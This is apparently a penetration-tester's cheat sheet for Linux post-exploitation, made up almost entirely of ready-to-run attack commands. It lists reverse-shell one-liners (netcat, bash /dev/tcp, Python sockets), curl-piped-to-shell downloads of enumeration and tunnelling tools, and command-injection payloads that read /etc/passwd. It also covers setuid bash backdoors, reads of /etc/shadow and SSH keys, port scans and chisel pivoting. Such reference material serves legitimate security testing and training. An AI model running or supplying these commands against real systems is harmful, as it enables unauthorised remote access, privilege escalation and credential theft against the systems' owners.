sudo -l
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
curl "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -Lo lse.sh
chmod +x lse.sh
./lse.sh -l1
msfconsole -q -x 'use exploit; set RHOSTS ip; set RPORT port; run; exit'
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -O
/etc/passwd
& /etc/shadow
/www/html
ꞏ /var/www
ꞏ /srv/html
ꞏ /usr/share/*
/home/user/.ssh
/etc/cron.d
/opt/
/usr/local/bin
/etc/nginx/sites-available/default
/etc/apache2/sites-enabled/000-default.conf
/proc/
contains useful information about the processes that are currently running
directory | description |
---|---|
/proc/PID/cmdline |
Command line arguments. |
/proc/PID/cwd |
Link to the current working directory. |
/proc/PID/environ |
Values of environment variables. |
/proc/PID/exe |
Link to the executable of this process. |
/proc/PID/fd |
Directory, which contains all file descriptors. |
find / -user user 2>&-
find / -group group 2>&-
find / -user root -executable -type f 2>&- | grep -v /bin/
/sbin/getcap -r *
nc -lp 4444
# Client
resh ip 4444
# Server
resh 4444
nc ip 4444 -e /bin/bash
mkfifo /tmp/f;nc ip 4444 0</tmp/f|/bin/sh -i 2>&1|tee /tmp/f
bash -c 'bash -i >& /dev/tcp/ip/4444 0>&1'"
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
bash -i
python3 -c 'import pty; pty.spawn("/bin/bash")'
script -qc /bin/bash /dev/null
rlwrap is a ‘readline wrapper’, a small utility that uses the GNU Readline library to allow the editing of keyboard input for any command. For when you cannot spawn a proper TTY source
rlwrap command
# Receiving connection from a reverse shell
rlwrap nc -lnvp port
# Connecting to the victim
rlwrap nc ip port
# Add actual bash history and to put all words seen on in- and output on the completion list.
rlwrap nc -r -f . nc ip port
/bin/cp /bin/bash /tmp/bash_up; /bin/chown user:group /tmp/bash_up; chmod g+s /tmp/bash_up; chmod u+s /tmp/bash_up
/tmp/bash_up -p
chmod 4755 /bin/bash
bash -p
Port: 21
File transfer protocol (FTP) is an Internet tool provided by TCP/IP. It helps to transfer files from one computer to another by providing access to directories or folders on remote computers
nmap --script ftp-* -p 21 ip
wget -m --user=user --password=fpassword ftp://ip
wget -m --user=anonymous --password=anonymous ftp://ip
Port: 1337
Gdbserver is a computer program that makes it possible to remotely debug other programs. You need to have a copy of the program you want to debug put onto the target system.
$ gdb
(gdb) target extended-remote ip:port
(gdb) remote get remote_file local_file
(gdb) remote put local_file remote_file
;{cat,/etc/passwd}
;cat${IFS}/etc/passwd;
; cat /etc/passwd ;
$(cat /etc/passwd)
`cat /etc/passwd`
&& cat /etc/passwd &&
|| cat /etc/passwd ||
< <(cat /etc/passwd)
| cat /etc/passwd
"; cat /etc/passwd "
GTFOBins - Bypass local security restrictions
netstat -tulpn
for port in {1..65535}; do echo > /dev/tcp/ip/$port && echo "$port open"; done 2>/dev/null
for i in {1..254}; do (ping -c 1 192.168.1.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
# Install chisel
curl https://i.jpillora.com/chisel! | bash
# Example: 8000 -> 4444
# Attacker machine:
chisel server -p 4444 --reverse
# Victim machine:
chisel client ip-server:4444 R:8000:127.0.0.1:8000
ssh -L 8080:127.0.0.1:8080 user@ip
scp -P port user@192.168.1.ip:path .
scp -P port file user@192.168.1.ip:path
scp -P 22 -r ~/.peda user@192.168.1.ip:/tmp/peda